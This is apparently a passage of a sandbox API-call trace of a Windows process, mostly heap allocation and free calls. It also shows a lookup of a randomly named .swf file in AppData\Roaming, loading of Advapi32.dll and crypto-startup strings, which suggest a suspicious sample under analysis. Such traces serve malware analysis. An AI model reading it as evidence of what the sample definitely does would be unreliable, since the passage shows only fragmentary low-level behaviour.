hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04700 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0233.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0233.304] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0233.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0233.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0233.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0233.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0233.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0233.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0233.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0233.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0233.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0233.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0233.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0233.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0233.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0233.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0233.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0233.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0233.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0233.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0233.305] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0233.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0233.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0233.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0233.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0233.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0233.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0233.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0233.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0233.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0233.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0233.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0233.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0233.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0233.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0233.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0233.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0233.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0233.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0233.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0233.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0233.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0233.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0233.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0233.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0233.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0233.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0233.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0233.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0233.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0233.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0233.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.306] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0233.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0233.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0233.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0233.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0233.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0233.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0233.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0233.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0233.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0233.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0233.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0233.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0233.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0233.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0233.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0233.307] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0233.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0233.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0233.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0233.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0233.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0233.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0233.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0233.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0233.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0233.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0233.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0233.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0233.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0233.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0233.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0233.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0233.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0233.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0233.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0233.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0233.308] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/K KvEQBDpvTatLEa.swf", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1722d2f0, ftCreationTime.dwHighDateTime=0x1d5eaeb, ftLastAccessTime.dwLowDateTime=0x8d8a7750, ftLastAccessTime.dwHighDateTime=0x1d5ed56, ftLastWriteTime.dwLowDateTime=0x8d8a7750, ftLastWriteTime.dwHighDateTime=0x1d5ed56, nFileSizeHigh=0x0, nFileSizeLow=0x67e3, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="K KvEQBDpvTatLEa.swf", cAlternateFileName="KKVEQB~1.SWF")) returned 0xa87690 [0233.308] FindClose (in: hFindFile=0xa87690 | out: hFindFile=0xa87690) returned 1 [0233.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0233.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0233.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0233.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0233.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0233.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0233.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0233.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0233.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.309] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0233.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0233.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0233.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0233.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0233.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0233.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0233.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0233.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0233.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0233.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0233.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0233.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0233.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0233.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0233.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0233.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0233.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.310] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0233.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0233.310] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0233.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0233.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ea8 [0233.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0233.310] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0233.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04038 [0233.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0233.310] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0233.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04038 | out: hHeap=0x970000) returned 1 [0233.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0233.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0233.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0233.310] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0233.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0233.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0233.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0233.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0233.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0233.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0233.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0233.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0233.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0233.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0233.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0233.311] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0233.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0233.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0233.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0233.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0233.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0233.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0233.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0233.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0233.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0233.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0233.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0233.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0233.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0233.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0233.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0233.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0233.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0233.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0233.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0233.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0233.311] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0233.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0233.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0233.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0233.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0233.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0233.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0233.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0233.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0233.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.312] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0233.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.312] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0233.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0233.312] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0233.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0233.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0233.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0233.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0233.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0233.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0233.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0233.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e30 [0233.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0233.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0233.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0233.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0233.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0233.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0233.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0233.313] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0233.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0233.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0233.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0233.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0233.313] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0233.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0233.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0233.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 